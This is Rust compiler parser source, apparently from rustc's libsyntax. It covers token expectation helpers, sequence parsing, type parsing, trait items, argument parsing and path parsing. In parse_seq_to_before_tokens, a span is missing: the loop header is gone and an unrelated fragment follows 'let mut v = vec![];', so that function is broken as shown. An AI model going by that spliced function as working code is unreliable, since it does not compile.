pub fn expect(&mut self, t: &token::Token) -> PResult<'a, bool /* recovered */> {
if self.expected_tokens.is_empty() {
if self.token == *t {
self.bump();
Ok(false)
} else {
self.unexpected_try_recover(t)
}
} else {
self.expect_one_of(slice::from_ref(t), &[])
}
}
/// Expect next token to be edible or inedible token. If edible,
/// then consume it; if inedible, then return without consuming
/// anything. Signal a fatal error if next token is unexpected.
pub fn expect_one_of(
&mut self,
edible: &[token::Token],
inedible: &[token::Token],
) -> PResult<'a, bool /* recovered */> {
if edible.contains(&self.token) {
self.bump();
Ok(false)
} else if inedible.contains(&self.token) {
// leave it in the input
Ok(false)
} else if self.last_unexpected_token_span == Some(self.span) {
FatalError.raise();
} else {
self.expected_one_of_not_found(edible, inedible)
}
}
/// Returns the span of expr, if it was not interpolated or the span of the interpolated token.
fn interpolated_or_expr_span(
&self,
expr: PResult<'a, P<Expr>>,
) -> PResult<'a, (Span, P<Expr>)> {
expr.map(|e| {
if self.prev_token_kind == PrevTokenKind::Interpolated {
(self.prev_span, e)
} else {
(e.span, e)
}
})
}
pub fn parse_ident(&mut self) -> PResult<'a, ast::Ident> {
self.parse_ident_common(true)
}
fn parse_ident_common(&mut self, recover: bool) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, _) => {
if self.token.is_reserved_ident() {
let mut err = self.expected_ident_found();
if recover {
err.emit();
} else {
return Err(err);
}
}
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => {
Err(if self.prev_token_kind == PrevTokenKind::DocComment {
self.span_fatal_err(self.prev_span, Error::UselessDocComment)
} else {
self.expected_ident_found()
})
}
}
}
/// Checks if the next token is `tok`, and returns `true` if so.
///
/// This method will automatically add `tok` to `expected_tokens` if `tok` is not
/// encountered.
crate fn check(&mut self, tok: &token::Token) -> bool {
let is_present = self.token == *tok;
if !is_present { self.expected_tokens.push(TokenType::Token(tok.clone())); }
is_present
}
/// Consumes a token 'tok' if it exists. Returns whether the given token was present.
pub fn eat(&mut self, tok: &token::Token) -> bool {
let is_present = self.check(tok);
if is_present { self.bump() }
is_present
}
fn check_keyword(&mut self, kw: Symbol) -> bool {
self.expected_tokens.push(TokenType::Keyword(kw));
self.token.is_keyword(kw)
}
/// If the next token is the given keyword, eats it and returns
/// `true`. Otherwise, returns `false`.
pub fn eat_keyword(&mut self, kw: Symbol) -> bool {
if self.check_keyword(kw) {
self.bump();
true
} else {
false
}
}
fn eat_keyword_noexpect(&mut self, kw: Symbol) -> bool {
if self.token.is_keyword(kw) {
self.bump();
true
} else {
false
}
}
/// If the given word is not a keyword, signals an error.
/// If the next token is not the given word, signals an error.
/// Otherwise, eats it.
fn expect_keyword(&mut self, kw: Symbol) -> PResult<'a, ()> {
if !self.eat_keyword(kw) {
self.unexpected()
} else {
Ok(())
}
}
crate fn check_ident(&mut self) -> bool {
if self.token.is_ident() {
true
} else {
self.expected_tokens.push(TokenType::Ident);
false
}
}
fn check_path(&mut self) -> bool {
if self.token.is_path_start() {
true
} else {
self.expected_tokens.push(TokenType::Path);
false
}
}
fn check_type(&mut self) -> bool {
if self.token.can_begin_type() {
true
} else {
self.expected_tokens.push(TokenType::Type);
false
}
}
fn check_const_arg(&mut self) -> bool {
if self.token.can_begin_const_arg() {
true
} else {
self.expected_tokens.push(TokenType::Const);
false
}
}
/// Expects and consumes a `+`. if `+=` is seen, replaces it with a `=`
/// and continues. If a `+` is not seen, returns `false`.
///
/// This is used when token-splitting `+=` into `+`.
/// See issue #47856 for an example of when this may occur.
fn eat_plus(&mut self) -> bool {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Plus)));
match self.token {
token::BinOp(token::Plus) => {
self.bump();
true
}
token::BinOpEq(token::Plus) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::Eq, span);
true
}
_ => false,
}
}
/// Checks to see if the next token is either `+` or `+=`.
/// Otherwise returns `false`.
fn check_plus(&mut self) -> bool {
if self.token.is_like_plus() {
true
}
else {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Plus)));
false
}
}
/// Expects and consumes an `&`. If `&&` is seen, replaces it with a single
/// `&` and continues. If an `&` is not seen, signals an error.
fn expect_and(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::And)));
match self.token {
token::BinOp(token::And) => {
self.bump();
Ok(())
}
token::AndAnd => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Ok(self.bump_with(token::BinOp(token::And), span))
}
_ => self.unexpected()
}
}
/// Expects and consumes an `|`. If `||` is seen, replaces it with a single
/// `|` and continues. If an `|` is not seen, signals an error.
fn expect_or(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Or)));
match self.token {
token::BinOp(token::Or) => {
self.bump();
Ok(())
}
token::OrOr => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Ok(self.bump_with(token::BinOp(token::Or), span))
}
_ => self.unexpected()
}
}
fn expect_no_suffix(&self, sp: Span, kind: &str, suffix: Option<ast::Name>) {
literal::expect_no_suffix(&self.sess.span_diagnostic, sp, kind, suffix)
}
/// Attempts to consume a `<`. If `<<` is seen, replaces it with a single
/// `<` and continue. If `<-` is seen, replaces it with a single `<`
/// and continue. If a `<` is not seen, returns false.
///
/// This is meant to be used when parsing generics on a path to get the
/// starting token.
fn eat_lt(&mut self) -> bool {
self.expected_tokens.push(TokenType::Token(token::Lt));
let ate = match self.token {
token::Lt => {
self.bump();
true
}
token::BinOp(token::Shl) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::Lt, span);
true
}
token::LArrow => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::BinOp(token::Minus), span);
true
}
_ => false,
};
if ate {
// See doc comment for `unmatched_angle_bracket_count`.
self.unmatched_angle_bracket_count += 1;
self.max_angle_bracket_count += 1;
debug!("eat_lt: (increment) count={:?}", self.unmatched_angle_bracket_count);
}
ate
}
fn expect_lt(&mut self) -> PResult<'a, ()> {
if !self.eat_lt() {
self.unexpected()
} else {
Ok(())
}
}
/// Expects and consumes a single `>` token. if a `>>` is seen, replaces it
/// with a single `>` and continues. If a `>` is not seen, signals an error.
fn expect_gt(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::Gt));
let ate = match self.token {
token::Gt => {
self.bump();
Some(())
}
token::BinOp(token::Shr) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Gt, span))
}
token::BinOpEq(token::Shr) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Ge, span))
}
token::Ge => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Eq, span))
}
_ => None,
};
match ate {
Some(_) => {
// See doc comment for `unmatched_angle_bracket_count`.
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("expect_gt: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
Ok(())
},
None => self.unexpected(),
}
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
pub fn parse_seq_to_end<T, F>(&mut self,
ket: &token::Token,
sep: SeqSep,
f: F)
-> PResult<'a, Vec<T>> where
F: FnMut(&mut Parser<'a>) -> PResult<'a, T>,
{
let (val, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.bump();
}
Ok(val)
}
/// Parses a sequence, not including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
pub fn parse_seq_to_before_end<T, F>(
&mut self,
ket: &token::Token,
sep: SeqSep,
f: F,
) -> PResult<'a, (Vec<T>, bool)>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, T>
{
self.parse_seq_to_before_tokens(&[ket], sep, TokenExpectType::Expect, f)
}
crate fn parse_seq_to_before_tokens<T, F>(
&mut self,
kets: &[&token::Token],
sep: SeqSep,
expect: TokenExpectType,
mut f: F,
) -> PResult<'a, (Vec<T>, bool /* recovered */)>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, T>
{
let mut first = true;
let mut recovered = false;
let mut v = vec![]; | TokenExpectType::NoExpect => self.token == **k,
}
}) {
match self.token {
token::CloseDelim(..) | token::Eof => break,
_ => {}
};
if let Some(ref t) = sep.sep {
if first {
first = false;
} else {
match self.expect(t) {
Ok(false) => {}
Ok(true) => {
recovered = true;
break;
}
Err(mut e) => {
// Attempt to keep parsing if it was a similar separator
if let Some(ref tokens) = t.similar_tokens() {
if tokens.contains(&self.token) {
self.bump();
}
}
e.emit();
// Attempt to keep parsing if it was an omitted separator
match f(self) {
Ok(t) => {
v.push(t);
continue;
},
Err(mut e) => {
e.cancel();
break;
}
}
}
}
}
}
if sep.trailing_sep_allowed && kets.iter().any(|k| {
match expect {
TokenExpectType::Expect => self.check(k),
TokenExpectType::NoExpect => self.token == **k,
}
}) {
break;
}
let t = f(self)?;
v.push(t);
}
Ok((v, recovered))
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_unspanned_seq<T, F>(
&mut self,
bra: &token::Token,
ket: &token::Token,
sep: SeqSep,
f: F,
) -> PResult<'a, Vec<T>> where
F: FnMut(&mut Parser<'a>) -> PResult<'a, T>,
{
self.expect(bra)?;
let (result, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.eat(ket);
}
Ok(result)
}
/// Advance the parser by one token
pub fn bump(&mut self) {
if self.prev_token_kind == PrevTokenKind::Eof {
// Bumping after EOF is a bad sign, usually an infinite loop.
self.bug("attempted to bump the parser past EOF (may be stuck in a loop)");
}
self.prev_span = self.meta_var_span.take().unwrap_or(self.span);
// Record last token kind for possible error recovery.
self.prev_token_kind = match self.token {
token::DocComment(..) => PrevTokenKind::DocComment,
token::Comma => PrevTokenKind::Comma,
token::BinOp(token::Plus) => PrevTokenKind::Plus,
token::BinOp(token::Or) => PrevTokenKind::BitOr,
token::Interpolated(..) => PrevTokenKind::Interpolated,
token::Eof => PrevTokenKind::Eof,
token::Ident(..) => PrevTokenKind::Ident,
_ => PrevTokenKind::Other,
};
let next = self.next_tok();
self.span = next.sp;
self.token = next.tok;
self.expected_tokens.clear();
// check after each token
self.process_potential_macro_variable();
}
/// Advance the parser using provided token as a next one. Use this when
/// consuming a part of a token. For example a single `<` from `<<`.
fn bump_with(&mut self, next: token::Token, span: Span) {
self.prev_span = self.span.with_hi(span.lo());
// It would be incorrect to record the kind of the current token, but
// fortunately for tokens currently using `bump_with`, the
// prev_token_kind will be of no use anyway.
self.prev_token_kind = PrevTokenKind::Other;
self.span = span;
self.token = next;
self.expected_tokens.clear();
}
pub fn look_ahead<R, F>(&self, dist: usize, f: F) -> R where
F: FnOnce(&token::Token) -> R,
{
if dist == 0 {
return f(&self.token)
}
f(&match self.token_cursor.frame.tree_cursor.look_ahead(dist - 1) {
Some(tree) => match tree {
TokenTree::Token(_, tok) => tok,
TokenTree::Delimited(_, delim, _) => token::OpenDelim(delim),
},
None => token::CloseDelim(self.token_cursor.frame.delim),
})
}
crate fn look_ahead_span(&self, dist: usize) -> Span {
if dist == 0 {
return self.span
}
match self.token_cursor.frame.tree_cursor.look_ahead(dist - 1) {
Some(TokenTree::Token(span, _)) => span,
Some(TokenTree::Delimited(span, ..)) => span.entire(),
None => self.look_ahead_span(dist - 1),
}
}
/// Returns whether any of the given keywords are `dist` tokens ahead of the current one.
fn is_keyword_ahead(&self, dist: usize, kws: &[Symbol]) -> bool {
self.look_ahead(dist, |t| kws.iter().any(|&kw| t.is_keyword(kw)))
}
/// Is the current token one of the keywords that signals a bare function type?
fn token_is_bare_fn_keyword(&mut self) -> bool {
self.check_keyword(kw::Fn) ||
self.check_keyword(kw::Unsafe) ||
self.check_keyword(kw::Extern)
}
/// Parses a `TyKind::BareFn` type.
fn parse_ty_bare_fn(&mut self, generic_params: Vec<GenericParam>) -> PResult<'a, TyKind> {
/*
[unsafe] [extern "ABI"] fn (S) -> T
^~~~^ ^~~~^ ^~^ ^
| | | |
| | | Return type
| | Argument types
| |
| ABI
Function Style
*/
let unsafety = self.parse_unsafety();
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
self.expect_keyword(kw::Fn)?;
let (inputs, c_variadic) = self.parse_fn_args(false, true)?;
let ret_ty = self.parse_ret_ty(false)?;
let decl = P(FnDecl {
inputs,
output: ret_ty,
c_variadic,
});
Ok(TyKind::BareFn(P(BareFnTy {
abi,
unsafety,
generic_params,
decl,
})))
}
/// Parses asyncness: `async` or nothing.
fn parse_asyncness(&mut self) -> IsAsync {
if self.eat_keyword(kw::Async) {
IsAsync::Async {
closure_id: ast::DUMMY_NODE_ID,
return_impl_trait_id: ast::DUMMY_NODE_ID,
}
} else {
IsAsync::NotAsync
}
}
/// Parses unsafety: `unsafe` or nothing.
fn parse_unsafety(&mut self) -> Unsafety {
if self.eat_keyword(kw::Unsafe) {
Unsafety::Unsafe
} else {
Unsafety::Normal
}
}
/// Parses the items in a trait declaration.
pub fn parse_trait_item(&mut self, at_end: &mut bool) -> PResult<'a, TraitItem> {
maybe_whole!(self, NtTraitItem, |x| x);
let attrs = self.parse_outer_attributes()?;
let mut unclosed_delims = vec![];
let (mut item, tokens) = self.collect_tokens(|this| {
let item = this.parse_trait_item_(at_end, attrs);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// See `parse_item` for why this clause is here.
if !item.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
item.tokens = Some(tokens);
}
Ok(item)
}
fn parse_trait_item_(&mut self,
at_end: &mut bool,
mut attrs: Vec<Attribute>) -> PResult<'a, TraitItem> {
let lo = self.span;
self.eat_bad_pub();
let (name, node, generics) = if self.eat_keyword(kw::Type) {
self.parse_trait_item_assoc_ty()?
} else if self.is_const_item() {
self.expect_keyword(kw::Const)?;
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
let default = if self.eat(&token::Eq) {
let expr = self.parse_expr()?;
self.expect(&token::Semi)?;
Some(expr)
} else {
self.expect(&token::Semi)?;
None
};
(ident, TraitItemKind::Const(ty, default), ast::Generics::default())
} else if let Some(mac) = self.parse_assoc_macro_invoc("trait", None, &mut false)? {
// trait item macro.
(Ident::invalid(), ast::TraitItemKind::Macro(mac), ast::Generics::default())
} else {
let (constness, unsafety, asyncness, abi) = self.parse_fn_front_matter()?;
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let decl = self.parse_fn_decl_with_self(|p: &mut Parser<'a>| {
// This is somewhat dubious; We don't want to allow
// argument names to be left off if there is a
// definition...
// We don't allow argument names to be left off in edition 2018.
p.parse_arg_general(p.span.rust_2018(), true, false)
})?;
generics.where_clause = self.parse_where_clause()?;
let sig = ast::MethodSig {
header: FnHeader {
unsafety,
constness,
abi,
asyncness,
},
decl,
};
let body = match self.token {
token::Semi => {
self.bump();
*at_end = true;
debug!("parse_trait_methods(): parsing required method");
None
}
token::OpenDelim(token::Brace) => {
debug!("parse_trait_methods(): parsing provided method");
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(inner_attrs.iter().cloned());
Some(body)
}
token::Interpolated(ref nt) => {
match **nt {
token::NtBlock(..) => {
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(inner_attrs.iter().cloned());
Some(body)
}
_ => {
return self.expected_semi_or_open_brace();
}
}
}
_ => {
return self.expected_semi_or_open_brace();
}
};
(ident, ast::TraitItemKind::Method(sig, body), generics)
};
Ok(TraitItem {
id: ast::DUMMY_NODE_ID,
ident: name,
attrs,
generics,
node,
span: lo.to(self.prev_span),
tokens: None,
})
}
/// Parses an optional return type `[ -> TY ]` in a function declaration.
fn parse_ret_ty(&mut self, allow_plus: bool) -> PResult<'a, FunctionRetTy> {
if self.eat(&token::RArrow) {
Ok(FunctionRetTy::Ty(self.parse_ty_common(allow_plus, true, false)?))
} else {
Ok(FunctionRetTy::Default(self.span.shrink_to_lo()))
}
}
/// Parses a type.
pub fn parse_ty(&mut self) -> PResult<'a, P<Ty>> {
self.parse_ty_common(true, true, false)
}
/// Parses a type in restricted contexts where `+` is not permitted.
///
/// Example 1: `&'a TYPE`
/// `+` is prohibited to maintain operator priority (P(+) < P(&)).
/// Example 2: `value1 as TYPE + value2`
/// `+` is prohibited to avoid interactions with expression grammar.
fn parse_ty_no_plus(&mut self) -> PResult<'a, P<Ty>> {
self.parse_ty_common(false, true, false)
}
fn parse_ty_common(&mut self, allow_plus: bool, allow_qpath_recovery: bool,
allow_c_variadic: bool) -> PResult<'a, P<Ty>> {
maybe_recover_from_interpolated_ty_qpath!(self, allow_qpath_recovery);
maybe_whole!(self, NtTy, |x| x);
let lo = self.span;
let mut impl_dyn_multi = false;
let node = if self.eat(&token::OpenDelim(token::Paren)) {
// `(TYPE)` is a parenthesized type.
// `(TYPE,)` is a tuple with a single field of type TYPE.
let mut ts = vec![];
let mut last_comma = false;
while self.token != token::CloseDelim(token::Paren) {
ts.push(self.parse_ty()?);
if self.eat(&token::Comma) {
last_comma = true;
} else {
last_comma = false;
break;
}
}
let trailing_plus = self.prev_token_kind == PrevTokenKind::Plus;
self.expect(&token::CloseDelim(token::Paren))?;
if ts.len() == 1 && !last_comma {
let ty = ts.into_iter().nth(0).unwrap().into_inner();
let maybe_bounds = allow_plus && self.token.is_like_plus();
match ty.node {
// `(TY_BOUND_NOPAREN) + BOUND + ...`.
TyKind::Path(None, ref path) if maybe_bounds => {
self.parse_remaining_bounds(Vec::new(), path.clone(), lo, true)?
}
TyKind::TraitObject(ref bounds, TraitObjectSyntax::None)
if maybe_bounds && bounds.len() == 1 && !trailing_plus => {
let path = match bounds[0] {
GenericBound::Trait(ref pt, ..) => pt.trait_ref.path.clone(),
GenericBound::Outlives(..) => self.bug("unexpected lifetime bound"),
};
self.parse_remaining_bounds(Vec::new(), path, lo, true)?
}
// `(TYPE)`
_ => TyKind::Paren(P(ty))
}
} else {
TyKind::Tup(ts)
}
} else if self.eat(&token::Not) {
// Never type `!`
TyKind::Never
} else if self.eat(&token::BinOp(token::Star)) {
// Raw pointer
TyKind::Ptr(self.parse_ptr()?)
} else if self.eat(&token::OpenDelim(token::Bracket)) {
// Array or slice
let t = self.parse_ty()?;
// Parse optional `; EXPR` in `[TYPE; EXPR]`
let t = match self.maybe_parse_fixed_length_of_vec()? {
None => TyKind::Slice(t),
Some(length) => TyKind::Array(t, AnonConst {
id: ast::DUMMY_NODE_ID,
value: length,
}),
};
self.expect(&token::CloseDelim(token::Bracket))?;
t
} else if self.check(&token::BinOp(token::And)) || self.check(&token::AndAnd) {
// Reference
self.expect_and()?;
self.parse_borrowed_pointee()?
} else if self.eat_keyword_noexpect(kw::Typeof) {
// `typeof(EXPR)`
// In order to not be ambiguous, the type must be surrounded by parens.
self.expect(&token::OpenDelim(token::Paren))?;
let e = AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
};
self.expect(&token::CloseDelim(token::Paren))?;
TyKind::Typeof(e)
} else if self.eat_keyword(kw::Underscore) {
// A type to be inferred `_`
TyKind::Infer
} else if self.token_is_bare_fn_keyword() {
// Function pointer type
self.parse_ty_bare_fn(Vec::new())?
} else if self.check_keyword(kw::For) {
// Function pointer type or bound list (trait object type) starting with a poly-trait.
// `for<'lt> [unsafe] [extern "ABI"] fn (&'lt S) -> T`
// `for<'lt> Trait1<'lt> + Trait2 + 'a`
let lo = self.span;
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
if self.token_is_bare_fn_keyword() {
self.parse_ty_bare_fn(lifetime_defs)?
} else {
let path = self.parse_path(PathStyle::Type)?;
let parse_plus = allow_plus && self.check_plus();
self.parse_remaining_bounds(lifetime_defs, path, lo, parse_plus)?
}
} else if self.eat_keyword(kw::Impl) {
// Always parse bounds greedily for better error recovery.
let bounds = self.parse_generic_bounds(None)?;
impl_dyn_multi = bounds.len() > 1 || self.prev_token_kind == PrevTokenKind::Plus;
TyKind::ImplTrait(ast::DUMMY_NODE_ID, bounds)
} else if self.check_keyword(kw::Dyn) &&
(self.span.rust_2018() ||
self.look_ahead(1, |t| t.can_begin_bound() &&
!can_continue_type_after_non_fn_ident(t))) {
self.bump(); // `dyn`
// Always parse bounds greedily for better error recovery.
let bounds = self.parse_generic_bounds(None)?;
impl_dyn_multi = bounds.len() > 1 || self.prev_token_kind == PrevTokenKind::Plus;
TyKind::TraitObject(bounds, TraitObjectSyntax::Dyn)
} else if self.check(&token::Question) ||
self.check_lifetime() && self.look_ahead(1, |t| t.is_like_plus()) {
// Bound list (trait object type)
TyKind::TraitObject(self.parse_generic_bounds_common(allow_plus, None)?,
TraitObjectSyntax::None)
} else if self.eat_lt() {
// Qualified path
let (qself, path) = self.parse_qpath(PathStyle::Type)?;
TyKind::Path(Some(qself), path)
} else if self.token.is_path_start() {
// Simple path
let path = self.parse_path(PathStyle::Type)?;
if self.eat(&token::Not) {
// Macro invocation in type position
let (delim, tts) = self.expect_delimited_token_tree()?;
let node = Mac_ { path, tts, delim };
TyKind::Mac(respan(lo.to(self.prev_span), node))
} else {
// Just a type path or bound list (trait object type) starting with a trait.
// `Type`
// `Trait1 + Trait2 + 'a`
if allow_plus && self.check_plus() {
self.parse_remaining_bounds(Vec::new(), path, lo, true)?
} else {
TyKind::Path(None, path)
}
}
} else if self.check(&token::DotDotDot) {
if allow_c_variadic {
self.eat(&token::DotDotDot);
TyKind::CVarArgs
} else {
return Err(self.fatal(
"only foreign functions are allowed to be C-variadic"
));
}
} else {
let msg = format!("expected type, found {}", self.this_token_descr());
return Err(self.fatal(&msg));
};
let span = lo.to(self.prev_span);
let ty = P(Ty { node, span, id: ast::DUMMY_NODE_ID });
// Try to recover from use of `+` with incorrect priority.
self.maybe_report_ambiguous_plus(allow_plus, impl_dyn_multi, &ty);
self.maybe_recover_from_bad_type_plus(allow_plus, &ty)?;
self.maybe_recover_from_bad_qpath(ty, allow_qpath_recovery)
}
fn parse_remaining_bounds(&mut self, generic_params: Vec<GenericParam>, path: ast::Path,
lo: Span, parse_plus: bool) -> PResult<'a, TyKind> {
let poly_trait_ref = PolyTraitRef::new(generic_params, path, lo.to(self.prev_span));
let mut bounds = vec![GenericBound::Trait(poly_trait_ref, TraitBoundModifier::None)];
if parse_plus {
self.eat_plus(); // `+`, or `+=` gets split and `+` is discarded
bounds.append(&mut self.parse_generic_bounds(Some(self.prev_span))?);
}
Ok(TyKind::TraitObject(bounds, TraitObjectSyntax::None))
}
fn parse_borrowed_pointee(&mut self) -> PResult<'a, TyKind> {
let opt_lifetime = if self.check_lifetime() { Some(self.expect_lifetime()) } else { None };
let mutbl = self.parse_mutability();
let ty = self.parse_ty_no_plus()?;
return Ok(TyKind::Rptr(opt_lifetime, MutTy { ty: ty, mutbl: mutbl }));
}
fn parse_ptr(&mut self) -> PResult<'a, MutTy> {
let mutbl = if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else if self.eat_keyword(kw::Const) {
Mutability::Immutable
} else {
let span = self.prev_span;
let msg = "expected mut or const in raw pointer type";
self.struct_span_err(span, msg)
.span_label(span, msg)
.help("use `*mut T` or `*const T` as appropriate")
.emit();
Mutability::Immutable
};
let t = self.parse_ty_no_plus()?;
Ok(MutTy { ty: t, mutbl: mutbl })
}
fn is_named_argument(&self) -> bool {
let offset = match self.token {
token::Interpolated(ref nt) => match **nt {
token::NtPat(..) => return self.look_ahead(1, |t| t == &token::Colon),
_ => 0,
}
token::BinOp(token::And) | token::AndAnd => 1,
_ if self.token.is_keyword(kw::Mut) => 1,
_ => 0,
};
self.look_ahead(offset, |t| t.is_ident()) &&
self.look_ahead(offset + 1, |t| t == &token::Colon)
}
/// Skips unexpected attributes and doc comments in this position and emits an appropriate
/// error.
/// This version of parse arg doesn't necessarily require identifier names.
fn parse_arg_general(
&mut self,
require_name: bool,
is_trait_item: bool,
allow_c_variadic: bool,
) -> PResult<'a, Arg> {
if let Ok(Some(arg)) = self.parse_self_arg() {
return self.recover_bad_self_arg(arg, is_trait_item);
}
let (pat, ty) = if require_name || self.is_named_argument() {
debug!("parse_arg_general parse_pat (require_name:{})", require_name);
self.eat_incorrect_doc_comment("method arguments");
let pat = self.parse_pat(Some("argument name"))?;
if let Err(mut err) = self.expect(&token::Colon) {
if let Some(ident) = self.argument_without_type(
&mut err,
pat,
require_name,
is_trait_item,
) {
err.emit();
return Ok(dummy_arg(ident));
} else {
return Err(err);
}
}
self.eat_incorrect_doc_comment("a method argument's type");
(pat, self.parse_ty_common(true, true, allow_c_variadic)?)
} else {
debug!("parse_arg_general ident_to_pat");
let parser_snapshot_before_ty = self.clone();
self.eat_incorrect_doc_comment("a method argument's type");
let mut ty = self.parse_ty_common(true, true, allow_c_variadic);
if ty.is_ok() && self.token != token::Comma &&
self.token != token::CloseDelim(token::Paren) {
// This wasn't actually a type, but a pattern looking like a type,
// so we are going to rollback and re-parse for recovery.
ty = self.unexpected();
}
match ty {
Ok(ty) => {
let ident = Ident::new(kw::Invalid, self.prev_span);
let pat = P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Ident(
BindingMode::ByValue(Mutability::Immutable), ident, None),
span: ty.span,
});
(pat, ty)
}
Err(mut err) => {
// If this is a C-variadic argument and we hit an error, return the
// error.
if self.token == token::DotDotDot {
return Err(err);
}
// Recover from attempting to parse the argument as a type without pattern.
err.cancel();
mem::replace(self, parser_snapshot_before_ty);
self.recover_arg_parse()?
}
}
};
Ok(Arg { ty, pat, id: ast::DUMMY_NODE_ID })
}
/// Parses an argument in a lambda header (e.g., `|arg, arg|`).
fn parse_fn_block_arg(&mut self) -> PResult<'a, Arg> {
let pat = self.parse_pat(Some("argument name"))?;
let t = if self.eat(&token::Colon) {
self.parse_ty()?
} else {
P(Ty {
id: ast::DUMMY_NODE_ID,
node: TyKind::Infer,
span: self.prev_span,
})
};
Ok(Arg {
ty: t,
pat,
id: ast::DUMMY_NODE_ID
})
}
fn maybe_parse_fixed_length_of_vec(&mut self) -> PResult<'a, Option<P<ast::Expr>>> {
if self.eat(&token::Semi) {
Ok(Some(self.parse_expr()?))
} else {
Ok(None)
}
}
/// Matches `'-' lit | lit` (cf. `ast_validation::AstValidator::check_expr_within_pat`).
crate fn parse_literal_maybe_minus(&mut self) -> PResult<'a, P<Expr>> {
maybe_whole_expr!(self);
let minus_lo = self.span;
let minus_present = self.eat(&token::BinOp(token::Minus));
let lo = self.span;
let literal = self.parse_lit()?;
let hi = self.prev_span;
let expr = self.mk_expr(lo.to(hi), ExprKind::Lit(literal), ThinVec::new());
if minus_present {
let minus_hi = self.prev_span;
let unary = self.mk_unary(UnOp::Neg, expr);
Ok(self.mk_expr(minus_lo.to(minus_hi), unary, ThinVec::new()))
} else {
Ok(expr)
}
}
fn parse_path_segment_ident(&mut self) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, _) if self.token.is_path_segment_keyword() => {
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => self.parse_ident(),
}
}
fn parse_ident_or_underscore(&mut self) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, false) if ident.name == kw::Underscore => {
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => self.parse_ident(),
}
}
/// Parses a qualified path.
/// Assumes that the leading `<` has been parsed already.
///
/// `qualified_path = <type [as trait_ref]>::path`
///
/// # Examples
/// `<T>::default`
/// `<T as U>::a`
/// `<T as U>::F::a<S>` (without disambiguator)
/// `<T as U>::F::a::<S>` (with disambiguator)
fn parse_qpath(&mut self, style: PathStyle) -> PResult<'a, (QSelf, ast::Path)> {
let lo = self.prev_span;
let ty = self.parse_ty()?;
// `path` will contain the prefix of the path up to the `>`,
// if any (e.g., `U` in the `<T as U>::*` examples
// above). `path_span` has the span of that path, or an empty
// span in the case of something like `<T>::Bar`.
let (mut path, path_span);
if self.eat_keyword(kw::As) {
let path_lo = self.span;
path = self.parse_path(PathStyle::Type)?;
path_span = path_lo.to(self.prev_span);
} else {
path_span = self.span.to(self.span);
path = ast::Path { segments: Vec::new(), span: path_span };
}
// See doc comment for `unmatched_angle_bracket_count`.
self.expect(&token::Gt)?;
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("parse_qpath: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
self.expect(&token::ModSep)?;
let qself = QSelf { ty, path_span, position: path.segments.len() };
self.parse_path_segments(&mut path.segments, style)?;
Ok((qself, ast::Path { segments: path.segments, span: lo.to(self.prev_span) }))
}
/// Parses simple paths.
///
/// `path = [::] segment+`
/// `segment = ident | ident[::]<args> | ident[::](args) [-> type]`
///
/// # Examples
/// `a::b::C<D>` (without disambiguator)
/// `a::b::C::<D>` (with disambiguator)
/// `Fn(Args)` (without disambiguator)
/// `Fn::(Args)` (with disambiguator)
pub fn parse_path(&mut self, style: PathStyle) -> PResult<'a, ast::Path> {
maybe_whole!(self, NtPath, |path| {
if style == PathStyle::Mod &&
path.segments.iter().any(|segment| segment.args.is_some()) {
self.diagnostic().span_err(path.span, "unexpected generic arguments in path");
}
path
});
let lo = self.meta_var_span.unwrap_or(self.span);
let mut segments = Vec::new();
let mod_sep_ctxt = self.span.ctxt();
if self.eat(&token::ModSep) {
segments.push(PathSegment::path_root(lo.shrink_to_lo().with_ctxt(mod_sep_ctxt)));
}
self.parse_path_segments(&mut segments, style)?;
Ok(ast::Path { segments, span: lo.to(self.prev_span) })
}
